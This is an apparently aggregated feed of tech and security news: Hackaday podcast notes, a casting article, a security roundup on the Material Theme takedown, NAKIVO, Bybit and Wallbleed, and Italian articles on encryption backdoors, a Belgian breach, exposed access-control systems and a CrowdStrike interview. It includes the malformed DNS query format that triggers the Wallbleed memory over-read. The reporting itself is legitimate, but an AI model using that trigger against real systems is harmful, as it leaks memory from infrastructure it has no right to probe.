Then it’s on to the hacks and such beginning with a beautiful handheld compass CNC and cyanotype prints made with resin printer’s UV light. After that, we take a look at open-source random numbers, a 3D-printed instant camera, and a couple of really cool cyberdecks. Finally, we discuss whether DOOM is doomed as the port of choice in this day and age, and kvetch about keyboards.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

Download in DRM-free MP3 and savor at your leisure.

Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:

• iTunes
• Spotify
• Stitcher
• RSS
• YouTube
• Check out our Libsyn landing page

Episode 310 Show Notes:

News:

• Hackaday Europe 2025: Workshops And More Speakers
• KiCad 9 Moves Up In The Pro League
• We’re Hiring: Come Join Us!

What’s that Sound?

• Congrats to [Dakota] who drew lucky number 13 and a Hackaday Podcast t-shirt!

Interesting Hacks of the Week:

• Handheld Compass CNC Lets Teensy Do The Driving
  
  • Hands-On The Shaper Origin: A Tool That Changes How We Build

  
  

• Cyanotype Prints On A Resin 3D Printer
  
  • Using A Potato As Photographic Recording Surface

  
  

• Open-Source Random Numbers
• 3D Print An Instant Camera
• Harvesting Water With High Voltage
• A Precisely Elegant Cyberdeck Handheld

Quick Hacks:

• Elliot’s Picks:
  
  • Pico Gets A Speed Bump
  • A Web-Based Graphics Editor For Tiny Screens
  • To Test A (Smart) LED
  • Import GPU: Python Programming With CUDA
  • SHOUT For Smaller QR Codes

  
  

• Kristina’s Picks:
  
  • 3D Print Yourself A Split Flap Display
  • The Perfect Pi Pico Portable Computer
  • Infill Injection Experiment Makes Stronger Parts

  
  

Can’t-Miss Articles:

• What Game Should Replace Doom As The Meme Port Of Choice?
• Keebin’ With Kristina: The One With All The Green Keyboards

hackaday.com/2025/02/28/hackad…

[Kelly Coffield] makes intake manifolds for old Ford throttle bodies for fun, demonstrating an excellent technique for making such things in the small shop. The mould patterns are CNC machined from a solid polystyrene block, with all the necessary gates to feed the aluminium into the mould. The principle is to introduce aluminium from a large central runner into the mould structure, which feeds the gates into the mould parts. The various foam mould components are then glued with an extra brace bar at the bottom to strengthen it.
Dip coating with a refractory slurry
The complete structure is then sprayed with surfactant (just plain old soapy water) and dip-coated in a refractory slurry. The surfactant adjusts the coating’s surface tension, preventing bubbles from forming and ruining the surface quality produced by this critical coating step.

Once a satisfactory coating has been applied and hardened, the structure is placed inside a moulding pan fitted with a pneumatic turbine vibrator, to allow sand to be introduced. The vibrations ease the flow of sand into all the nooks and crannies, fully supporting the delicate mould structure against the weight of the metal, and gases produced as the foam burns away. A neat offset pouring cup is then added to the top of the structure and packed in with more sand to stabilise it. It’s a simple setup that can easily be replicated in any hackerspace or backyard for those motivated enough. [Kelly] is using A356 aluminium alloy, but there’s no reason this technique won’t work for other metals.

It was amusing to see [Kelly] demould by just dumping out the whole stack onto the drive and throwing the extracted casting into a snow bank after quenching. We might as well use all that free Midwest winter cooling capacity! After returning to the shop, [Kelly] would typically perform any needed adjustments, such as improving flatness in the press, while the part was in the ‘as cast temper’ condition. We’ll gloss over the admission of cutting the gates off on the table saw! After these adjustments, the part is artificially aged to a T5-like specification, to give it its final strength and machinability properties. There are plenty more videos on this process on the channel, which is well worth a look.

Aluminium casting is nothing new here, here’s a simple way to cast using a 3D printed pattern. But beware, casting aluminum can be hazardous, it does like to burn.

youtube.com/embed/zxFAhnvXzys?…

Thanks to [Chuck] for the tip!

hackaday.com/2025/02/28/lost-f…

It’s usually not a good sign when your downloaded theme contains obfuscated code. Yes, we’re talking about the very popular Material Theme for VSCode. This one has a bit of a convoluted history. One of the authors wanted to make some money from all those downloads. The original Material Theme was yanked from the VSCode store, the source code (improperly) re-licensed as closed source, and replaced with freemium versions. And this week, those freemium versions have been pulled by Microsoft for containing malware.

Now there’s a quirk to this story. No one has been able to answer a simple yet vital question: What exactly did the theme plugin do that was malicious? The official response is that “A theming extension with heavily obfuscated code and unreasonable dependencies including a utility for running child processes”. Looking at the official statements and unofficial security reviews, I can’t find confirmation that the plugins have actually been observed doing something malicious. The only concrete problem is that the plugin shipped obfuscated JavaScript. There are several incomplete statements about a problem with a sanity.io dependency that may have been compromised.

The conclusion at this point is that a thorough security review of these plugins has not been published. The Microsoft team found enough problematic elements in the plugins to trigger pulling them. But I join the chorus of voices calling on Microsoft to clearly answer the vital question: Have any users of Material Theme plugins actually been compromised?

Low-hanging Backups

NAKIVO backup has an interesting endpoint, the getImageByPath call that’s used for loading the system’s logo, and is accessible for unauthenticated users. It’s pretty simple, just taking a path to a file on the appliance filesystem, and returning the byte array for use as an image. And of course, it doesn’t check whether the requested file is actually an image. Nor is it limited to a list of allowed paths.

So hence we essentially have an arbitrary file read. It’s not entirely arbitrary, as the file is first loaded into memory before being served. So the backups themselves are likely too big to successfully exfiltrate in this way. There are still some rather interesting targets, including the system logs. But the real juicy target is the system database itself. Thankfully, the user credentials for the NAVIKO system itself seem to be properly hashed to avoid casual theft. But setting up useful backups will require all sorts of integrations, like SSH and AWS credentials. And those are stored in plain text inside the database. Whoops.

Apple Did What?

A couple weeks ago we talked about Apple and the UK government having a tussle over iCloud backup encryption. Apple has finally rolled out end-to-end encryption for those backups, and the UK’s Snooper’s Charter has been used to require Apple to add an encryption backdoor in that system. That’s problematic for multiple reasons, and Apple has opted to not quietly oblige the UK government. You may have seen headlines that Apple has pulled access to the new Advanced Data Protection (ADP) for UK users. This seems to be the next step of anti-compliance with the new UK rule.

The logic here seems to be that not offering any end-to-end encrypted backup system for UK users is a better choice than claiming to offer such a system that actually contains a backdoor. That’s doubly true, as the law in question doesn’t seem to limit itself to UK users. If the UK government doesn’t back down on their extremely questionable demands, the next major step may be for Apple to pull sales from the country entirely.

Crypto Heist

We have a pair of crypto heist stories this week, with the first one being the largest in history. At a staggering $1.5 Billion, this seems like the biggest single theft of any kind to ever be successfully pulled off. And the details of how it was done are still a bit murky. The funds were stolen out of a Bybit “multisig” cold wallet. Those are clever currency stores that actually include smart contracts in the storage mechanism, requiring multiple owners to sign off on transactions.

It’s believed that this hack was pulled off by North Korean agents, through the use of very clever but simple techniques: Social engineering, and UI manipulation. In essence, a request for digital signature that claimed to do something benign, that actually unlocked the funds for theft. Some things never seem to change.

And that’s not all that’s happening with Cryptocurrency these days. It turns out that there’s another dead-simple attack that is targeting job-seeking individuals, instead of huge companies. “We may have a job for you, go to this website and run this application to apply!” Rather than a legitimate videoconferencing or interviewing application, the download is a simple backdoor. It’s used primarily to find crypto wallets and siphon the funds out.

Wallbleed

Remember Heartbleed? That’s the glitch in OpenSSL from 2014, where the TLS heartbeat implementation could trivially leak large amounts of system memory. Wallbleed is a strangely similar bug in the implementation of the Chinese Great Firewall system. One way the Great Firewall does censorship is via DNS injection. Request the DNS information for a blocked domain, and the firewall will intercept that request in real time, and return a spoofed response with a bogus IP address for the requested domain. Importantly for this discussion, that spoofing is bi-directional. You can send DNS requests to Chinese IP addresses, and get spoofed responses from the Great Firewall.

DNS request and response packets use an interesting variable length transport system, where the domain name being requested is turned into a set of length-value pairs. example.com is represented as 07example03com00. 7 bytes for the domain, then 3 bytes for the TLD, and a terminating null. Many of us are immediately wondering, what happens if that query was packed incorrectly: 07example20com00? There aren’t actually 20 bytes in the query, so what do various DNS responders do when handed such a query? Well-written DNS servers recognize that this is garbage, and just drop the packet. Some of the great firewall infrastructure did something far more interesting. It spoofs the DNS response, and performs a buffer over-read when constructing the response. Yes, leaking a few bytes of raw system memory back to the requester, a la Heartbleed.

And when we say “a few bytes”, the maximum observed leakage in a single spoofed response was 125. As you might imagine, that’s quite a bit of data. Enough data, in fact, to learn quite a bit about the Great Firewall and what sort of traffic it sees. There were also what appeared to be x86_64 pointers and Linux stack frames.

This attack was first discovered by researchers in 2021 and finally completely fixed in March 2024. In the intermediate time, those researchers used the vulnerability quite heavily to mine the Great Firewall infrastructure for data. This is an interesting ethical question. Normally it’s considered completely unacceptable to weaponize a vulnerability beyond what’s needed as a proof of concept. The Great Firewall is in some ways an adversarial device, making exploitation a bit murkier. On the other hand, vulnerabilities like this a usually disclosed in order to get them fixed. What is a researcher’s responsibility in this case, when the vulnerability is in a censorship device? It seems the Chinese authorities discovered the Wallbleed vulnerability themselves, excusing researchers from needing to fully answer this particular ethical question.

Bits and Bytes

It’s not surprising to open up an electronic device, and find an ugly glob of potting compound spread over one or several of the key chips inside. Or for some devices, the compound is ubiquitous, covering everything. [Graham Sutherland] has some thoughts on how to defeat the stuff. And while some is obvious, like using a drill press to very carefully expose a target interface, there are some really inventive ideas I would never have considered, like throwing an entire board into a pressure cooker for an hour!

How long does it take for a cyber criminal to go from initial access on an internal machine, to full access to a privileged computer? In the ReliaQuest case, it was 48 minutes. The hack was simple and clever. Start a mass spam and phishing campaign, and then pose as a helpful IT worker who could help end the carnage. All it takes is one employee to fall for the fake help desk routine, and 48 minutes.

Let’s say you wanted to pirate music from a streaming service like Deezer, but you really didn’t want your IP address or machine associated with the piracy. What would you do? Use Tor? VPNs? How about create a malicious PyPi package that does your downloading for you. That seems to be the bizarre case of automslc, a reasonably popular package that secretly downloads and scrapes from the music platform.

hackaday.com/2025/02/28/this-w…

La Francia si sta preparando ad approvare leggi che potrebbero rivoluzionare la sicurezza online, obbligando i fornitori di servizi di telecomunicazioni a installare backdoor nelle app di messaggistica crittografata e limitando l’accesso alle risorse Internet tramite VPN. L’iniziativa ha suscitato aspre critiche da parte di Tuta (ex Tutanota) e della VPN Trust Initiative (VTI).

Il primo disegno di legge controverso è un emendamento alla legge francese sul narcotraffico, che impone ai servizi di comunicazioni criptate di fornire alle forze dell’ordine i messaggi decriptati dei sospettati entro 72 ore dalla richiesta. Il mancato rispetto degli obblighi comporterà sanzioni fino a 1,5 milioni di euro per le persone fisiche e fino al 2% del fatturato globale annuo per le aziende. Sebbene la legge non sia ancora entrata in vigore, è già stata approvata dal Senato francese e passerà all’esame dell’Assemblea nazionale.

Tuta ha chiamato i parlamentari che hanno respinto l’emendamento, sostenendo che indebolire la crittografia avrebbe creato vulnerabilità non solo per i criminali, ma anche per gli utenti comuni. L’azienda sottolinea che, anche se la backdoor viene creata nell’interesse delle forze dell’ordine, può essere utilizzata da criminali informatici e agenzie governative. Tuta ha sottolineato che tali iniziative violano le leggi dell’UE sulla protezione dei dati (GDPR) e anche gli standard tedeschi sulla sicurezza informatica.

Contemporaneamente, in Francia si sta valutando un’altra innovazione: l’obbligo per i servizi VPN di bloccare l’accesso ai siti pirata. La holding mediatica Canal+ e la Lega calcio francese (LFP) hanno lanciato un’iniziativa in tal senso, chiedendo ai provider Internet e ai servizi VPN di limitare l’accesso a determinate risorse web.

VPN Trust Initiative (VTI), che include AWS, Google, Cloudflare, Namecheap, OVH, IPVanish VPN, Ivacy VPN, NordVPN, PureVPN ed ExpressVPN, ha condannato una mossa del genere, affermando che la lotta alla pirateria non dovrebbe portare alla censura e alla violazione dei diritti degli utenti. Nella sua lettera aperta, l’organizzazione ha tracciato parallelismi tra l’iniziativa e le restrizioni imposte a Internet in altri paesi, tra cui Cina, Myanmar e Iran, sottolineando che tali misure costituiscono un precedente per la censura di massa.

La Francia non è l’unico Paese in cui il controllo sui dati Internet sta aumentando. Nel Regno Unito, il governo ha recentemente richiesto da Apple di fornire l’accesso ai backup crittografati di iCloud. In risposta, l’azienda ha spento l’opzione di crittografia end-to-end per gli utenti del Regno Unito. In Svezia è in preparazione un disegno di legge che obbligherà i messaggeri Signal e WhatsApp creare backdoor tecniche per fornire l’accesso ai messaggi crittografati.

Di recente è emersa anche la notizia che il capo dell’Europol Catherine De Bolle vuole collaborare con le principali aziende tecnologiche per ampliare la cooperazione con le forze dell’ordine sulle questioni relative alla crittografia. A suo avviso, il rifiuto di tale interazione potrebbe rappresentare una minaccia per la democrazia europea.

L'articolo I Venti di Sorveglianza Di Massa Invadono l’Europa! Anche La Francia vuole Backdoor per eludere la crittografia proviene da il blog della sicurezza informatica.

La Procura generale belga ha avviato un’indagine su una fuga di dati del Servizio di sicurezza dello Stato (VSSE) presumibilmente effettuata da hacker cinesi. Secondo quanto riferito, i criminali informatici hanno avuto accesso al server di posta elettronica esterno di VSSE tra il 2021 e maggio 2023, intercettando circa il 10% di tutte le e-mail inviate e ricevute dai dipendenti del dipartimento.

Il server compromesso è stato usato per comunicare con la procura, i ministeri, le forze dell’ordine e altri enti governativi. Inoltre, questo server è stato utilizzato da discussioni interne, che ha potenzialmente portato alla fuga di dati personali di dipendenti e candidati, compresi i loro curriculum e documenti di identità.

Il primo segnale dell’attacco è stato rilevato nel 2023, quando i media belgi hanno segnalato un incidente, che ha coinciso con la divulgazione di una vulnerabilità nei prodotti Barracuda. In seguito a ciò, VSSE ha smesso di utilizzare le soluzioni aziendali e ha raccomandato ai dipendenti di sostituire i documenti per ridurre il rischio di frode di identità.

Tuttavia, secondo fonti anonime, al momento non ci sono prove che i dati rubati siano apparsi sul darknet o siano stati utilizzati a fini di estorsione. Gli specialisti della sicurezza VSSE continuano a monitorare i forum underground e le piattaforme di trading alla ricerca di tracce e a potenziale fughe di dati. A peggiorare la situazione, l’attacco informatico è avvenuto in un momento in cui l’organizzazione era impegnata in un’importante campagna di assunzioni.

La VSSE ha rifiutato di rilasciare dichiarazioni, confermando solo che è stata presentata una denuncia formale in merito all’incidente. Allo stesso tempo, la Procura federale belga ha dichiarato che l’indagine è iniziata nel novembre 2023, ma è ancora troppo presto per trarre conclusioni. L’ambasciata della Cina in Belgio ha respinto le accuse, affermando che le autorità belghe non avevano fornito prove convincenti.

Si ritiene che l’attacco alla VSSE sia stato effettuato utilizzando una vulnerabilità Zero-Day nei Gateway di sicurezza della posta elettronica Barracuda (ESG). Nel 2023, gli specialisti Mandiant hanno attribuito attacchi mirati al gruppo UNC4841 che lavora per conto del governo cinese.

L'articolo I Servizi Segreti del Belgio Violati dagli Hacker Cinesi. 10% delle email compromesse in due anni proviene da il blog della sicurezza informatica.

Microsoft ha rimosso due estensioni popolari, Material Theme – Free e Material Theme Icons – Free, da Visual Studio Marketplace, in quanto sospettate di contenere codice dannoso.

In totale, queste estensioni sono state scaricate quasi 9 milioni di volte e ora gli utenti ricevono avvisi che indicano che le estensioni sono state disattivate automaticamente. Il loro editore, Mattia Astorino (alias equinusocio), ha diverse altre estensioni nel Visual Studio Marketplace, con un totale complessivo di oltre 13 milioni di installazioni.

Le informazioni secondo cui le estensioni potrebbero essere dannose provengono dai ricercatori di sicurezza informatica Amit Assaraf e Itay Kruk. Nel loro rapporto gli esperti hanno affermato di aver trovato codice sospetto nelle estensioni e di aver segnalato le loro scoperte a Microsoft.

I ricercatori sottolineano che il codice dannoso è stato iniettato nell’estensione tramite un aggiornamento, il che potrebbe indicare un attacco alla supply chain tramite una dipendenza o una compromissione dell’account dello sviluppatore.

Un altro campanello d’allarme era la presenza di codice JavaScript fortemente offuscato nei file release-notes.js.

“Microsoft ha rimosso entrambe le estensioni dal marketplace di VS Code e bannato il loro sviluppatore”,ha detto un dipendente Microsoft a YCombinator. — Uno dei membri della community ha effettuato un’analisi approfondita della sicurezza di queste estensioni e ha trovato molti “segnali d’allarme” che indicavano intenti malevoli, per poi segnalarcelo. I ricercatori di sicurezza Microsoft hanno confermato queste affermazioni e hanno trovato ulteriore codice sospetto. Abbiamo bandito l’editore da VS Marketplace, rimosso tutte le sue estensioni e disinstallato tutte le istanze di VS Code che eseguivano tali estensioni. Per essere chiari, la rimozione non ha nulla a che fare con il copyright o con la licenza, ma solo con potenziali intenti malevoli”. Microsoft ha promesso di pubblicare a breve informazioni più dettagliate sull’attività dannosa nel repository VSMarketplace su GitHub.

Lo sviluppatore dell’estensione, Mattia Astorino, ha risposto alle domande sui potenziali pericoli delle estensioni affermando che i problemi erano causati da una dipendenza obsoleta di sanity.io che “sembra essere compromessa”. Secondo lui, non c’è mai stato nulla di dannoso nel Material Theme e l’unico problema era una dipendenza obsoleta di sanity.io, “che veniva utilizzata per visualizzare le note di rilascio del CMS headless sanity”.

“Questa dipendenza esiste dal 2016 e ha superato con successo tutti i controlli, ma ora sembra compromessa. Nessuno di Microsoft ci ha contattato per rimuoverlo. Hanno appena distrutto tutto, causando problemi a milioni di utenti e causando il blocco di VSCode (sì, è colpa loro). Hanno rotto tutto senza mai chiederci spiegazioni, scrive Astorino. — Rimuovere la vecchia dipendenza è stato un lavoro da 30 secondi, ma sembra che sia così che funziona Microsoft. Inoltre, forniamo un file index.js offuscato che contiene tutti i comandi e la logica del tema. È offuscato perché l’estensione è ora closed source. Se la rimuovi, l’estensione continuerà a funzionare con i normali file JSON.”

Finché la situazione non sarà chiarita, si consiglia agli utenti di rimuovere i seguenti file da tutti i progetti:

• equinusocio.moxer-theme;
• equinusocio.vsc-material-theme;
• equinusocio.vsc-material-theme-icons;
• equinusocio.vsc-community-material-theme;
• equinusocio.moxer-icons.

L'articolo Cybercrime contro gli sviluppatori VS Code: 9 milioni di utenti a rischio dopo la rimozione delle estensioni proviene da il blog della sicurezza informatica.

Se pensavate che la cybersecurity riguardasse solo i dati digitali, ecco una realtà ben più inquietante: 49.000 sistemi di controllo accessi (AMS) sono stati trovati esposti online, senza protezioni adeguate, mettendo a rischio la sicurezza fisica di edifici governativi, infrastrutture critiche e aziende in tutto il mondo.

Un’esposizione pericolosa

Esempi di sistemi di controllo accessi. Immagine dal sito Modat
Secondo i ricercatori di Modat, questi AMS gestiscono l’accesso a strutture sensibili attraverso badge, sistemi biometrici e riconoscimento targhe. Tuttavia, le configurazioni errate di migliaia di dispositivi hanno lasciato le porte digitali spalancate, consentendo a chiunque di visualizzare e persino manipolare dati sensibili come:

• Nomi, email e numeri di telefono degli impiegati
• Dati biometrici come impronte digitali e riconoscimento facciale
• Fotografie personali
• Orari di lavoro e registri di accesso ai locali

E non è tutto: in alcuni casi, i ricercatori sono riusciti a modificare i record degli impiegati, creare utenti fittizi e alterare le credenziali di accesso, rendendo possibili scenari da film di spionaggio, in cui un attaccante potrebbe impedire l’ingresso a personale autorizzato o, peggio, concederlo a intrusi.

Italia in prima fila nell’esposizione

Posizione dei dispositivi AMS esposti. Immagine dal sito Modat
A livello globale, i numeri sono allarmanti, ma c’è un dato che fa riflettere ancora di più: il paese con il maggior numero di AMS esposti è l’Italia, con ben 16.678 dispositivi vulnerabili. Seguono il Messico (5.940) e il Vietnam (5.035), mentre negli Stati Uniti il numero si attesta a 1.966.

Danni oltre la sicurezza fisica

Oltre al rischio di intrusioni fisiche, l’accesso a questi dati apre la porta a minacce informatiche di alto livello, come attacchi di spear-phishing e social engineering. Conoscere il nome di un dipendente, la sua email e il suo orario di lavoro consente ai cybercriminali di orchestrare attacchi mirati con un’efficacia devastante.

Come proteggersi?

Alcuni vendor hanno dichiarato di essere al lavoro con i clienti per mitigare il problema, ma la lentezza nelle risposte è preoccupante, considerando la gravità della falla.

Le misure per arginare il problema esistono e dovrebbero essere adottate immediatamente:

• Spegnere l’accesso remoto: se il sistema non deve essere accessibile online, meglio rimuoverlo dalla rete pubblica.
• Firewall e VPN: gli AMS devono essere dietro un firewall e accessibili solo tramite VPN sicure.
• Cambio delle credenziali di default: sembra banale, ma molti sistemi sono ancora vulnerabili a brute-force perché usano username e password di fabbrica.
• MFA e aggiornamenti: implementare l’autenticazione multi-fattore e installare gli aggiornamenti di sicurezza più recenti.
• Crittografia e gestione dei dati: i dati biometrici e le informazioni personali devono essere sempre criptati, e i profili di ex-dipendenti devono essere cancellati per evitare usi fraudolenti.

Conclusione

Questa scoperta dei ricercatori di Modat evidenzia come la sicurezza fisica e informatica siano ormai inscindibili. Una vulnerabilità nel mondo digitale può avere conseguenze devastanti nel mondo reale. Se le aziende e le istituzioni non prenderanno provvedimenti immediati, le conseguenze potrebbero essere disastrose. La domanda è: quanti altri sistemi critici sono esposti senza che nessuno se ne accorga?

L'articolo Italia e Sicurezza Fisica a Rischio! 16.678 Dispositivi di Controllo Accessi Esposti Online proviene da il blog della sicurezza informatica.

Nel panorama odierno della sicurezza informatica, CrowdStrike si distingue come uno dei leader più innovativi e influenti. Fondata nel 2011 da George Kurtz, Dmitri Alperovitch e Gregg Marston, l’azienda ha rapidamente guadagnato una reputazione per la sua capacità di rilevare e prevenire minacce informatiche avanzate. Con una combinazione di tecnologie all’avanguardia, intelligenza artificiale e un team di esperti di sicurezza, CrowdStrike è diventata una forza trainante nella protezione delle organizzazioni contro gli attacchi informatici.

In questa intervista a Luca Nilo Livrieri, Director, Sales Engineering Southern Europe di CrowdStrike, discuteremo delle sfide attuali che le aziende devono affrontare nel campo della sicurezza informatica e di come CrowdStrike sta rispondendo a queste minacce in continua evoluzione. Inoltre, parleremo del ruolo dell’intelligenza artificiale nella protezione dei dati e delle infrastrutture critiche.

La soluzione di maggior interesse fornita da CrowdStrike è la sua piattaforma Falcon, che utilizza una combinazione di analisi comportamentale e intelligenza artificiale per rilevare e rispondere alle minacce in tempo reale. Questa tecnologia ha rivoluzionato il modo in cui le aziende possono proteggere i loro sistemi, offrendo una visibilità senza precedenti sulle attività sospette e consentendo una risposta rapida ed efficace.

Luca non mancherà di discutere delle tendenze future nel campo della sicurezza informatica e di come CrowdStrike si sta preparando per affrontare le nuove sfide che di giorno in giorno emergono. Con l’aumento della digitalizzazione e l’espansione delle superfici di attacco, la capacità di adattarsi rapidamente e di innovare è cruciale per mantenere la sicurezza delle informazioni.
Luca Nilo Livrieri, Director, Sales Engineering Southern Europe di CrowdStrike
Accenneremo inoltre a come le attuali tensioni geopolitiche e conflitti globali, come gli scenari Ucraina/Russia, Cina/Taiwan stanno influenzando la natura e la frequenza degli attacchi cyber.

1-RHC: Il vostro Global Threat Report annuale (GTR 2025) riassume l’analisi del team di intelligence di CrowdStrike effettuata nel corso del 2024 e descrive temi, tendenze ed eventi di rilievo nel panorama delle minacce informatiche. Questo report annuale include anche valutazioni anticipate delle minacce per aiutare le organizzazioni a prepararsi e a proteggersi durante il prossimo anno. Potrebbe condividere con noi alcune delle principali tendenze e minacce emerse dal report di quest’anno e come le aziende possono utilizzare queste informazioni per migliorare la propria postura digitale per il futuro?

Luca Nilo Livrieri: Il report evidenzia alcune tendenze significative in relazione alle tipologie di attacchi: il 79% degli attacchi rilevati da CrowdStrike nel 2024 risulta aver operato senza malware, utilizzando cioè strumenti legittimi già presenti nell’ambiente della vittima, e rendendo quasi impossibile distinguere l’attività malevole. Si parla quindi di intrusioni interattive o “hands-on”. Un dato altrettanto interessante emerso è l’aumento di attacchi che sfruttano tecniche di social engineering – vishing e call back phishing su tutte. Tenendo conto di queste tendenze, le aziende devono focalizzarsi su diversi aspetti: innanzitutto su una protezione delle identità, che vengono spesso usate dagli attaccanti come initial access, e poi su un rafforzamento delle soluzioni di rilevamento in real time basate su behaviour e, infine, sull’utilizzo di soluzioni di IA per aumentare la velocità della detection, investigation e response. Dal punto di vista organizzativo è necessario formare il personale a difendersi dal social engineering, implementare workflow automatizzati di remediation e sviluppare capacità di threat hinting a 360°su tutto il perimetro aziendale

2-RHC: Quali sono i trend nello eCrime? Quanto sono diffusi attacchi tramite malware rispetto ad attacchi mirati alle identità che non prevedano l’utilizzo di malware e/o includano l’uso di social engineering potenziato eventualmente dall’Intelligenza Artificiale Generativa (GenAI) (come ad esempio con video DeepFake)?

Luca Nilo Livrieri: Secondo l’analisi che abbiamo svolto nel 2024, come accennato nella risposta alla precedente domanda, vi è stata un’alta percentuale (79%) di attacchi senza utilizzo di malware e basati su tecniche “hands-on-keyboard” e strumenti legittimi: si preferiscono quindi metodi “fileless” e living-off-the-land. Gli attacchi alle identità risultano i più frequenti, essendo ormai da anni un trend in crescita. A tal proposito si è registrato, ad esempio, un aumento del 442% negli attacchi di vishing nella seconda metà del 2024 e un crescente utilizzo di GenAI per la creazione di contenuti più convincenti a supporto nelle operazioni di social engineering.

L’utilizzo dell’intelligenza artificiale ha supportato un’evoluzione delle tattiche dal phishing tradizionale verso tecniche alternative (vishing e callback) con un aumento dell’efficacia significativo, se in passato la classica email di phishing aveva un’efficacia del 12%, oggi la stessa email generata con l’AI ha un’efficacia del 54%.

3-RHC: Kevin Mitnick, noto come “il Condor”, è stato uno degli hacker più famosi e abili della storia. La sua carriera di hacking iniziò negli anni ’80, quando si dedicò al phreaking, ovvero l’hacking dei sistemi telefonici. Mitnick era un maestro nell’arte dell’ingegneria sociale, utilizzando tecniche di manipolazione psicologica per ottenere informazioni riservate direttamente dalle persone al telefono.

Quanto è ancora importante per le organizzazioni educare gli utenti a riconoscere tentativi di attacco tramite di voice phishing (vishing)?

Luca Nilo Livrieri: L’eredità delle tecniche di social engineering di Kevin Mitnick è più rilevante che mai nel panorama attuale delle minacce informatiche. L’allarmante aumento negli attacchi di vishing (del 442%), già citato, ha dimostrato come questa tecnica tradizionale si sia evoluta e rafforzata grazie alle nuove tecnologie.

Le tecniche di manipolazione psicologica che Mitnick utilizzava negli anni ’80 sono state potenziate dall’intelligenza artificiale e dalle tecnologie di clonazione vocale, rendendo gli attacchi di vishing significativamente più convincenti e difficili da identificare. Gli attaccanti moderni sfruttano ancora le stesse vulnerabilità umane – urgenza, autorità e fiducia – ma avendo a disposizione strumenti molto più sofisticati.

L’evoluzione tecnologica ha permesso di automatizzare e scalare questi attacchi, integrandoli con altri vettori di minaccia. La capacità di generare “voci clone” realistiche e di orchestrare attacchi su larga scala rende senza dubbio il vishing una minaccia ancora più seria rispetto al passato. É fondamentale per le organizzazioni proteggersi investendo nella formazione continua del personale, conducendo simulazioni realistiche e assicurando un aggiornamento costante della consapevolezza sulle nuove tecniche di attacco. Questa formazione deve essere supportata da solidi controlli tecnici, come l’autenticazione multi-fattore e protocolli di verifica delle richieste sensibili. Le organizzazioni devono inoltre stabilire procedure chiare e verificabili per la gestione delle richieste sensibili, definendo canali di comunicazione sicuri e implementando sistemi efficaci per il reporting di tentativi sospetti. La combinazione tra consapevolezza umana e controlli tecnici rimane la migliore difesa contro il vishing moderno, proprio come ai tempi di Mitnick, purché tenga conto della necessità di strumenti e procedure specificamente adattati alle sfide contemporanee

4-RHC: Sempre in merito ai trend, pensando alle vittime dello eCrime, potrebbe indicarci delle statistiche riguardo i settori verticali più significativi nelle aree geografiche più importanti?

Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un quadro complesso e preoccupante della distribuzione degli attacchi eCrime a livello globale e settoriale. L’analisi mostra come gli attori delle minacce abbiano intensificato significativamente le loro attività, con un’attenzione particolare al settore finanziario, che ha subito un drammatico aumento degli attacchi, specialmente da parte di gruppi legati alla Cina – con incrementi che hanno raggiunto il 200-300%.

A livello globale il Nord America continua a essere un obiettivo primario, particolarmente per quanto riguarda le istituzioni finanziarie e le aziende tecnologiche. L’Europa ha visto una concentrazione di attacchi diretti al settore manifatturiero e ai servizi finanziari, mentre nella regione Asia-Pacifico gli attaccanti hanno mostrato un interesse particolare per il settore industriale e manifatturiero.

Il settore sanitario e le infrastrutture critiche rimangono obiettivi di elevato interesse strategico a livello globale, con un’intensificazione degli attacchi particolarmente evidente nelle economie più sviluppate.

5-RHC: Oggi, la Cina è una delle principali economie mondiali, con un forte settore manifatturiero orientato all’esportazione. Qual è oggi la portata di operazioni di spionaggio informatico da parte di attori cinesi? La maturità degli attaccanti cinesi è aumentata in modo proporzionato all’aumento del loro potere economico?

Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un incremento sostanziale delle operazioni cyber cinesi, con un aumento complessivo del 150% trasversale su tutti i settori, con punte fino al 200-300% in ambiti strategicamente cruciali come il settore finanziario, mediatico, manifatturiero e ingegneristico-industriale. Questa escalation nelle attività di cyber-spionaggio riflette chiaramente l’ambizione cinese di consolidare la propria posizione di leadership tecnologica e industriale a livello globale. La maturazione delle capacità offensive cinesi è particolarmente evidente nell’evoluzione delle tattiche operative: gli attaccanti hanno abbandonato approcci più tradizionali e facilmente rilevabili in favore di metodologie più sofisticate e difficili da attribuire. Particolarmente significativa è la loro capacità di condurre operazioni stealth che evitano l’uso di malware, a favore di tecniche più sottili che sfruttano le vulnerabilità della supply chain e garantiscono una persistenza duratura nei sistemi compromessi. Questa evoluzione tecnica dimostra un chiaro allineamento con gli obiettivi strategici nazionali cinesi, come definiti nei piani quinquennali e nelle iniziative di sviluppo tecnologico del paese. La sofisticazione crescente degli attacchi cinesi rispecchia gli ingenti investimenti del paese in tecnologia e innovazione, creando una sinergia preoccupante tra potere economico e capacità cyber offensive. Per le organizzazioni globali, specialmente quelle operanti in settori strategici o quelle per le quali la proprietà intellettuale risulta un asset particolarmente significativo, questa evoluzione rappresenta una sfida crescente che richiede un approccio difensivo sempre più sofisticato e stratificato.

La minaccia rappresentata dagli attori cinesi non è più solo una questione di sicurezza informatica, ma si inserisce in un più ampio contesto di competizione geopolitica e tecnologica globale, richiedendo una risposta coordinata che coinvolga sia aspetti tecnici che strategici.

6-RHC: Considerando che, in base al vostro report GTR 2025, almeno cinque diversi threat actors state-sponsored legati alla Cina, come ad esempio APT41 (a.k.a. Wicked PANDA), utilizzano ora il malware KEYPLUG anche offuscando le loro attività attraverso reti ORB (Operational Relay Box), quali sono le principali caratteristiche di questo malware che lo rendono così versatile e resistente, e quali strategie possono adottare le organizzazioni per rilevare e mitigare tali minacce?

Luca Nilo Livrieri:KEYPLUG è un malware a bassa prevalenza, il che lo rende meno rilevabile rispetto ad altri malware più diffusi. Il suo impatto sul panorama delle minacce cyber è particolarmente significativo e ha contribuito a innalzare il livello generale di sofisticazione delle minacce. La sua condivisione tra diversi gruppi ha portato infatti a un continuo perfezionamento delle sue capacità, che l’hanno reso sempre più efficace e difficile da rilevare. La natura collaborativa dello sviluppo di KEYPLUG tra diversi gruppi di minacce cinesi sottolinea la necessità di un approccio alla sicurezza sempre più sofisticato e adattivo, capace di evolversi al passo con le crescenti capacità degli attaccanti.

